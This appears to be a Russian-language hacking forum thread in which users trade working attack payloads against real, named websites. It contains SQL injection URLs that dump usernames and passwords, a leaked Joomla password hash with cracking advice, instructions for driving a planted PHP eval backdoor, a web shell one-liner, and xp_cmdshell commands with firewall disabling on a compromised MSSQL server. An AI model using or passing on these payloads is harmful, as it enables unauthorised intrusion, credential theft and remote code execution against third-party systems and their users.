потому что таблица users в другой базе данных http://mvtextosmedicos.com.ar/index.php?cat_id=-23+union+select+concat(username,0x3a,password),2,3,4,5,6,7,8+from+test.users/* опередили...
чем расшифровать пасы от джумлы, подскажите чего-нить особо эффективное) sotramxan:bffc841658e3eb534f41915454d2cd6b:mLvhGI5BGHOuIKq7:[email protected]
У лебедя попробуй, хешкрякинг рулит! Я вот сча не помню где-то видел короче написали програму которая хеши брутит через видюху, правда там ни все поддерживает видеокарты, но говорят скорость брута мега супер! Попробую сча найти! ЗЫ Нашел, на держи - http://forum.insidepro.com/viewtopic.php?t=1983
http://www.ascmfoot.freesurf.fr/joueur.php3?idj=-37+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* - помогите найти таблицы, пожалуйста)) а лучше посоветуйте прогу для подбора таблиц по словорю,а то что-то найти не могу((
Здравствуйте! Подскажите, есть код внедренный в .php файл на сервере: Code: if(isset($_REQUEST['act']) and isset($_REQUEST['id4']) preg_replace("/55/e",$_REQUEST['act'],$_REQUEST['id4']); подскажите, как его правильно использовать? Т.е. как правильно передать несколько строк php в него, чтобы они выполнились? Спасибо!
работает! php_inj.php?id4=5567&act=phpinfo(); Code: if(isset($_REQUEST['act']) and isset($_REQUEST['id4'])) preg_replace("/55/e",$_REQUEST['act'],$_REQUEST['id4']); а какой код нужен, чтобы шелл залить?
fervex '<?system($_GET[cmd]);?>' Можешь захексить (ну и если с кавычками в порядке) потом обращаешься к нему /shell.php?cmd=ls -la Только найди диреторию drwxrwxrwx =) temp or tmp search
Есть у меня доступ к MSSQL на одном сайте. По началу мне казалось, что сайт лежит на этом же сервере. Перерыл все и не нашел )) Только потом до меня доперло, что sql server и web сервер - это разные физические сервера. Доступ у меня через бажный скрипт (index.asp?id=-1' такого рода), права dbo, комманды исполняются на ура. Собственно сам вопрос : Как мне узнать внешний IP MSSQL сервера?
помотри можно-ли выполнить консольные команды, если можно то настрой firewall и пингани себя. http://site.com/script.asp?id=1';exec master..xp_cmdshell 'ping -a твойip'--
Что-то блокирует пинги и тд. В процессах я не обнаружил нестандартных firewall'ов. А стандартный вырубил (предполагаю ) командой netsh firewall set opmode disable Вот перечень процессов: -------------------------------------------------------------- > tasklist hex code : 0x7461736b6c697374 -------------------------------------------------------------- Directory listing -------------------------------------------------------------- smss.exe 276 Console 0 448 K csrss.exe 324 Console 0 3,884 K winlogon.exe 348 Console 0 11,668 K services.exe 396 Console 0 12,264 K lsass.exe 408 Console 0 8,216 K svchost.exe 584 Console 0 2,760 K svchost.exe 648 Console 0 3,340 K svchost.exe 728 Console 0 4,676 K svchost.exe 764 Console 0 5,008 K svchost.exe 780 Console 0 25,320 K spoolsv.exe 932 Console 0 5,172 K msdtc.exe 956 Console 0 4,884 K svchost.exe 1164 Console 0 2,172 K FPAVServer.exe 1184 Console 0 46,464 K FreeFTPDService.exe 1216 Console 0 4,444 K inetinfo.exe 1244 Console 0 13,132 K sqlservr.exe 1324 Console 0 1,556,928 K svchost.exe 1820 Console 0 1,316 K winvnc4.exe 1108 Console 0 3,308 K mssearch.exe 1428 Console 0 1,116 K sqlagent.exe 1736 Console 0 4,852 K svchost.exe 2072 Console 0 4,752 K distrib.exe 2360 Console 0 6,736 K logread.exe 2400 Console 0 6,324 K distrib.exe 2444 Console 0 6,536 K wmiprvse.exe 2624 Console 0 6,640 K svchost.exe 2840 Console 0 3,936 K logon.scr 3684 Console 0 1,660 K cmd.exe 3648 Console 0 1,496 K more.com 3704 Console 0 5,392 K cmd.exe 3252 Console 0 1,492 K -------------------------------------------------------------- Есть подозрение на FPAVServer.exe, но вроде как это антивирус.
попробуй совет [Raz0r] http://site.com/script.asp?id=1 or 1=(select HOST_NAME())-- a еще попробуй через cmd ipconfig
Пробовал. Ответ - ALFIE. Возможно сервер действительно только локальный и доступа ко внешке у него нет. ipconfig я в первую очередь делал Но он мне выдал DNS-суффикс и локальный адрес. Можно-ли ченить с этого поднять? Или без вариантов?
Через SELECT ..... UNHEX(HEX(pole).... FROM ... не получилось я не понял, а как с этим делать 1+union+select+convert(pole)+using+latin1),+from+t able/* ? Запрос такого вида +select+1,2,3,4,5,[видимое поле],7,8,9,10+from+users/* название поля к примеру name Помогите, пожалуйста))
